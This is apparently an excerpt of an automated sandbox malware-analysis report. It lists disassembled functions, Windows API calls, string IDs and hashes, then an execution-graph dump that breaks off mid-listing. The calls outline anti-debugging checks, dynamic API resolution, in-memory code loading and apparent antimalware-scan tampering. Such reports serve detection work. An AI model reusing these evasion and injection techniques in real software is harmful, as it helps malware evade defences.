                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 0ed03dbd0742608c8a1ae954f71719c2276753d510452be69c06ebd9a7eecd16
                                                                        • Instruction ID: aa0bf311435c18e85d14802614f8443a43bc9e43a5ea307c61ac2d56e5e39f4b
                                                                        • Opcode Fuzzy Hash: 0ed03dbd0742608c8a1ae954f71719c2276753d510452be69c06ebd9a7eecd16
                                                                        • Instruction Fuzzy Hash: 2141B5707049384BD725EF7B889067EB3E7DF85240B544725DC52C3344EA26EAC1EA6D
                                                                        Function 02C67E50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02C67ED7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$MemoryMove
                                                                        • String ID: Ntdll$RtlM$oveM
                                                                        • API String ID: 2705147948-1610840992
                                                                        • Opcode ID: 544d3954bd9259e5cf05ecae5d3949c13b1dcdcecd66bafec25ca46482e0efda
                                                                        • Instruction ID: dc8b34ad8d16173078f4edf7f8462ab13c3edaa2e9d01a87ea43c7f44cf4d683
                                                                        • Opcode Fuzzy Hash: 544d3954bd9259e5cf05ecae5d3949c13b1dcdcecd66bafec25ca46482e0efda
                                                                        • Instruction Fuzzy Hash: AE01A270684344BFFB14EFA4DC8AF3AB7EDEB08B04F5008B0B905D6640C675ED189A29
                                                                        Function 02C681CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc
                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                        • API String ID: 1883125708-1952140341
                                                                        • Opcode ID: 818c6b07f7d6c040afbb133ad94d7b73cdde10391e5d2dd585271af686ebf2af
                                                                        • Instruction ID: 21b56f80235547b119b53ed26cc3b79bb87e61157f8c2d4c2a54099c3efa9061
                                                                        • Opcode Fuzzy Hash: 818c6b07f7d6c040afbb133ad94d7b73cdde10391e5d2dd585271af686ebf2af
                                                                        • Instruction Fuzzy Hash: B5F09670A84704AFEB14FFA4DC85A6DB7EDE74A7007514A61B900C3610D634AE58D929
                                                                        Function 02C6F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02C6FAEB,UacInitialize,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,Initialize), ref: 02C6F6EE
                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02C6F700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                        • API String ID: 1646373207-2367923768
                                                                        • Opcode ID: 2e17d29711c695e13178e45fdbb4175d5895c077dd0d2555eadbfb3470e02032
                                                                        • Instruction ID: 8ffdb28faa831c0f6786b69723e92ee35691ca4b242abc0abea6018ede7d5e2a
                                                                        • Opcode Fuzzy Hash: 2e17d29711c695e13178e45fdbb4175d5895c077dd0d2555eadbfb3470e02032
                                                                        • Instruction Fuzzy Hash: 6DD012A235436019BE00B2F43CC882903CC856452D3341F34F523C6592E9B6C8956018
                                                                        Function 02C5C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02C7D10B,00000000,02C7D11E), ref: 02C5C47A
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C5C48B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                        • API String ID: 1646373207-3712701948
                                                                        • Opcode ID: 37ad7bf4dc628a44f4e027d1eb1ece8a595e0008a329384d0546d0bf498af84f
                                                                        • Instruction ID: 645374b63d2fe61bcda0ef48e4c475feb6be277c4c6d7baacfdce668ed0b873b
                                                                        • Opcode Fuzzy Hash: 37ad7bf4dc628a44f4e027d1eb1ece8a595e0008a329384d0546d0bf498af84f
                                                                        • Instruction Fuzzy Hash: 25D05EE1A403745AEB00AAB95880B3122DDCB58314B108A66EC0159102EB72D6D88F1C
                                                                        Function 02C5E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C5E297
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C5E2B3
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C5E32A
                                                                        • VariantClear.OLEAUT32(?), ref: 02C5E353
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                        • String ID:
                                                                        • API String ID: 920484758-0
                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                        • Instruction ID: 664f45f83d5560563a043b213698c8ef950e35b784e9f8b03cc97be947ccd164
                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                        • Instruction Fuzzy Hash: 0F41F975A016299BCB62DF58CC90BCAB3BDAF49314F0041D5EA4DA7212DA30EFC19F58
                                                                        Function 02C5AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID:
                                                                        • API String ID: 3990497365-0
                                                                        • Opcode ID: 7b01b9f4bafe5681518b1eeaad4b56e424d391fb5024272a4f64e32b8dc4c02c
                                                                        • Instruction ID: 2030d175f4c4812b196e6d80aada7a20850b81f2daf7d841e25e7e747c3ffb2e
                                                                        • Opcode Fuzzy Hash: 7b01b9f4bafe5681518b1eeaad4b56e424d391fb5024272a4f64e32b8dc4c02c
                                                                        • Instruction Fuzzy Hash: C2411D709402689BDB61DB69CC84BDAB7FDAB48340F4401E5A948E7241DB74DFC4DF58
                                                                        Function 02C5AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C5AD59
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C5AD7D
                                                                        • GetModuleFileNameA.KERNEL32(02C50000,?,00000105), ref: 02C5AD98
                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C5AE2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID:
                                                                        • API String ID: 3990497365-0
                                                                        • Opcode ID: 64cc70f0679fcf327f0622fb8a752d428b28a0c87bd591ec55bd616a694101f0
                                                                        • Instruction ID: 1a960c431ff1d13a2b79f67d34124a9be22853a2428644c858afa8ab2bbbe8a8
                                                                        • Opcode Fuzzy Hash: 64cc70f0679fcf327f0622fb8a752d428b28a0c87bd591ec55bd616a694101f0
                                                                        • Instruction Fuzzy Hash: 0F412D70A402689BDB61EB59CC84BDAB7FDAB48340F4401E5A948E7241DB74DFC4DF58
                                                                        Function 02C51C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07d1675badda0b8dbd9fc5a9bbc5dcdcc9c517e9b82bfb7f6ce62c9d5711a0ce
                                                                        • Instruction ID: 5dd1c60d70b067fc0fb57eea394860a3fcf595ba08f7df52483e142952a3e0a9
                                                                        • Opcode Fuzzy Hash: 07d1675badda0b8dbd9fc5a9bbc5dcdcc9c517e9b82bfb7f6ce62c9d5711a0ce
                                                                        • Instruction Fuzzy Hash: 20A1D6767106200BD719AA7C9C8C3BDB3C2DBC4225F1D467EE91DCB281EBE5C9829658
                                                                        Function 02C594EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C595DA), ref: 02C59572
                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C595DA), ref: 02C59578
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: DateFormatLocaleThread
                                                                        • String ID: yyyy
                                                                        • API String ID: 3303714858-3145165042
                                                                        • Opcode ID: 1569dc0ff39a4f94d839949884e2721f27abcdde4aad51cf7c6ee79cfc71e3d8
                                                                        • Instruction ID: e95b6acee1387a95a554c94573252a14f1dade3c8595ef17ad8986963cc0bfa2
                                                                        • Opcode Fuzzy Hash: 1569dc0ff39a4f94d839949884e2721f27abcdde4aad51cf7c6ee79cfc71e3d8
                                                                        • Instruction Fuzzy Hash: E2215171A00268DFDB15DFA4C981AAE73B9EF49700F9101A5EC05D7250D730DED0DBA9
                                                                        Function 02C68338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                        • API String ID: 3811539418-184458249
                                                                        • Opcode ID: fc20f468746b1e7f3e893fe3afa94bbc90508a86953a629c407bd3628d391f33
                                                                        • Instruction ID: 683e68ad02598cf258fbcf27bc19108f6f96412e6a66bc81346812e7efb466d0
                                                                        • Opcode Fuzzy Hash: fc20f468746b1e7f3e893fe3afa94bbc90508a86953a629c407bd3628d391f33
                                                                        • Instruction Fuzzy Hash: E1016D71680304AFEB14EFA4DC85F6A77EDEB08B00F514570B908D6640D674ED689A28
                                                                        Function 02C6AF24 Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6AF58
                                                                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C6AF88
                                                                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 02C6AFA7
                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C6AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Read$Write
                                                                        • String ID:
                                                                        • API String ID: 3448952669-0
                                                                        • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                        • Instruction ID: 6b7772208712ee924caa84ed9374b2f68413aa54d129ca6b325515fd0c96b027
                                                                        • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                        • Instruction Fuzzy Hash: 2A21B4B26406199FDB10DF69CCC4BBE73A9EF90355F104511FD14A7380DB35E9118AAA

                                                                        Execution Graph

                                                                        Execution Coverage:1.5%
                                                                        Dynamic/Decrypted Code Coverage:98.9%
                                                                        Signature Coverage:4.9%
                                                                        Total number of Nodes:1027
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 96456 29156c6d 96462 29156d42 recv 96456->96462 96463 29156cdc 96468 29156d59 send 96463->96468 96469 2914e04e 96470 2914e063 ctype ___scrt_fastfail 96469->96470 96471 2914e266 96470->96471 96488 29162f55 21 API calls new 96470->96488 96477 2914e21a 96471->96477 96483 2914dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 96471->96483 96474 2914e277 96474->96477 96484 29162f55 21 API calls new 96474->96484 96476 2914e213 ___scrt_fastfail 96476->96477 96489 29162f55 21 API calls new 96476->96489 96479 2914e2b0 ___scrt_fastfail 96479->96477 96485 291635db 96479->96485 96481 2914e240 ___scrt_fastfail 96481->96477 96490 29162f55 21 API calls new 96481->96490 96483->96474 96484->96479 96491 291634fa 96485->96491 96487 291635e3 96487->96477 96488->96476 96489->96481 96490->96471 96492 29163513 96491->96492 96496 29163509 96491->96496 96492->96496 96497 29162f55 21 API calls new 96492->96497 96494 29163534 96494->96496 96498 291638c8 CryptAcquireContextA 96494->96498 96496->96487 96497->96494 96499 291638e4 96498->96499 96500 291638e9 CryptGenRandom 96498->96500 96499->96496 96500->96499 96501 291638fe CryptReleaseContext 96500->96501 96501->96499 96502 44210f9 96505 4421120 96502->96505 96506 4421152 96505->96506 96507 442127a VirtualAlloc 96506->96507 96514 442110f 96506->96514 96508 44212aa VirtualAlloc 96507->96508 96512 44212bd GetPEB 96507->96512 96508->96512 96508->96514 96510 4421386 96511 442143e GetPEB 96510->96511 96513 44213ef LoadLibraryA 96510->96513 96511->96514 96512->96510 96513->96510 96513->96514 96515 29164918 96516 29164924 ___DestructExceptionObject 96515->96516 96542 29164627 96516->96542 96518 2916492b 96520 29164954 96518->96520 96840 29164a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96518->96840 96528 29164993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96520->96528 96841 291742d2 5 API calls _ValidateLocalCookies 96520->96841 96522 2916496d 96524 29164973 ___DestructExceptionObject 96522->96524 96842 29174276 5 API calls _ValidateLocalCookies 96522->96842 96525 291649f3 96553 29164ba5 96525->96553 96528->96525 96843 29173487 36 API calls 4 library calls 96528->96843 96535 29164a15 96536 29164a1f 96535->96536 96845 291734bf 28 API calls _Atexit 96535->96845 96538 29164a28 96536->96538 96846 29173462 28 API calls _Atexit 96536->96846 96847 2916479e 13 API calls 2 library calls 96538->96847 96541 29164a30 96541->96524 96543 29164630 96542->96543 96848 29164cb6 IsProcessorFeaturePresent 96543->96848 96545 2916463c 96849 29168fb1 10 API calls 4 library calls 96545->96849 96547 29164641 96548 29164645 96547->96548 96850 2917415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96547->96850 96548->96518 96550 2916464e 96551 2916465c 96550->96551 96851 29168fda 8 API calls 3 library calls 96550->96851 96551->96518 96852 29166f10 96553->96852 96556 291649f9 96557 29174223 96556->96557 96854 2917f0d9 96557->96854 96559 2917422c 96561 29164a02 96559->96561 96858 29176895 36 API calls 96559->96858 96562 2913ea00 96561->96562 96860 2914cbe1 LoadLibraryA GetProcAddress 96562->96860 96564 2913ea1c GetModuleFileNameW 96865 2913f3fe 96564->96865 96566 2913ea38 96880 291320f6 96566->96880 96569 291320f6 28 API calls 96570 2913ea56 96569->96570 96886 2914beac 96570->96886 96574 2913ea68 96912 29131e8d 96574->96912 96576 2913ea71 96577 2913ea84 96576->96577 96578 2913eace 96576->96578 97180 2913fbee 118 API calls 96577->97180 96918 29131e65 96578->96918 96581 2913eade 96585 29131e65 22 API calls 96581->96585 96582 2913ea96 96583 29131e65 22 API calls 96582->96583 96584 2913eaa2 96583->96584 97181 29140f72 36 API calls __EH_prolog 96584->97181 96586 2913eafd 96585->96586 96923 2913531e 96586->96923 96589 2913eb0c 96928 29136383 96589->96928 96590 2913eab4 97182 2913fb9f 78 API calls 96590->97182 96594 2913eabd 97183 2913f3eb 71 API calls 96594->97183 96600 29131fd8 11 API calls 96602 2913ef36 96600->96602 96601 29131fd8 11 API calls 96603 2913eb36 96601->96603 96844 29173396 GetModuleHandleW 96602->96844 96604 29131e65 22 API calls 96603->96604 96605 2913eb3f 96604->96605 96945 29131fc0 96605->96945 96607 2913eb4a 96608 29131e65 22 API calls 96607->96608 96609 2913eb63 96608->96609 96610 29131e65 22 API calls 96609->96610 96612 2913eb7e 96610->96612 96611 2913ebe9 96613 29131e65 22 API calls 96611->96613 96612->96611 97184 29136c59 96612->97184 96618 2913ebf6 96613->96618 96615 2913ebab 96616 29131fe2 28 API calls 96615->96616 96617 2913ebb7 96616->96617 96620 29131fd8 11 API calls 96617->96620 96619 2913ec3d 96618->96619 96625 29143584 3 API calls 96618->96625 96949 2913d0a4 96619->96949 96622 2913ebc0 96620->96622 97189 29143584 RegOpenKeyExA 96622->97189 96623 2913ec43 96624 2913eac6 96623->96624 96952 2914b354 96623->96952 96624->96600 96631 2913ec21 96625->96631 96629 2913f38a 97265 291439e4 30 API calls 96629->97265 96630 2913ec5e 96632 2913ecb1 96630->96632 96969 29137751 96630->96969 96631->96619 97192 291439e4 30 API calls 96631->97192 96634 29131e65 22 API calls 96632->96634 96637 2913ecba 96634->96637 96646 2913ecc6 96637->96646 96647 2913eccb 96637->96647 96639 2913f3a0 97266 291424b0 65 API calls ___scrt_fastfail 96639->97266 96640 2913ec87 96644 29131e65 22 API calls 96640->96644 96641 2913ec7d 97193 29137773 30 API calls 96641->97193 96656 2913ec90 96644->96656 96645 2913f3aa 96649 